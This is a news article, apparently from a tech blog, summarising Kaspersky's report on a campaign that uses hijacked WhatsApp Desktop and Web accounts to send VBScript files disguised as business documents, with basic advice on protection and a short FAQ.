New Malicious Campaign Hijacks WhatsApp Accounts to Spread Malware

by Chief Editor

A new wave of cyberattacks is targeting WhatsApp Desktop and Web users by hijacking compromised accounts to distribute malware. According to Kaspersky’s Global Research and Analysis Team (GReAT), attackers are exploiting social trust by sending malicious files disguised as routine business documents to contacts of the compromised accounts.

How the WhatsApp Malware Campaign Operates

The infection chain begins when a user opens a received file that appears to be a legitimate business document, such as an invoice, bank statement, or payment receipt. Kaspersky reports that these files are actually VBScripts. Once opened, the script executes a silent process that creates a hidden working directory on the victim’s computer.

From there, the malware downloads additional malicious components from external servers without the user’s knowledge or interaction. The primary objective of this sequence is the installation of remote management and monitoring software. By abusing legitimate administrative tools, attackers gain unauthorized remote access and control over the infected system.

Did you know?
The malware is designed to operate silently in the background, making it difficult for the average user to detect that their system has been compromised until the attackers have already gained administrative control.

Geographic Reach and Targeted Languages

This campaign has moved beyond localized testing, with Kaspersky identifying victims across Malaysia, Brazil, Singapore, Taiwan, and Vietnam. The threat is not limited to a single region; the attackers have localized their malicious files into multiple languages, including Portuguese, English, French, and German.

Geographic Reach and Targeted Languages

This multi-language strategy suggests a deliberate effort to expand the attack surface into the European market. By mimicking the native language of the recipient, the attackers increase the likelihood that the target will trust and open the malicious attachment.

How to Protect Your Devices

Security experts emphasize that users should exercise extreme caution with unexpected attachments, even when they arrive from a known contact. Since the attack relies on hijacked accounts, the sender’s name is no longer a reliable indicator of safety.

  • Verify before clicking: Do not open script files or executables sent via WhatsApp without confirming the request through a secondary communication channel.
  • Keep software updated: Ensure your computer’s security software is active and updated to block unauthorized script execution.
  • Monitor system behavior: Be alert to unexpected performance issues, which can sometimes indicate that a remote management tool is running in the background.
Pro Tip:
If you receive a document you weren’t expecting, call or message the contact on a different platform to verify they actually sent the file before downloading it.

Frequently Asked Questions

Is the WhatsApp mobile app affected by this malware?

Kaspersky’s findings specifically highlight WhatsApp Desktop and WhatsApp Web as the primary targets for this campaign, as the malware is designed for computer operating systems.

Kaspersky Advanced Malware Analysis Techniques course

Why does the malware use legitimate administrative tools?

Attackers use “living-off-the-land” techniques, utilizing software already installed on the system to perform malicious actions. This makes it harder for traditional antivirus programs to flag the activity as suspicious.

What should I do if I suspect my account was compromised?

If you believe your account is sending files you didn’t authorize, log out of all active web and desktop sessions immediately via the WhatsApp settings menu on your phone and change your account security settings.


Stay informed on the latest digital threats by subscribing to our newsletter. Have you encountered suspicious files on messaging platforms? Share your experience in the comments below.

You may also like

Leave a Comment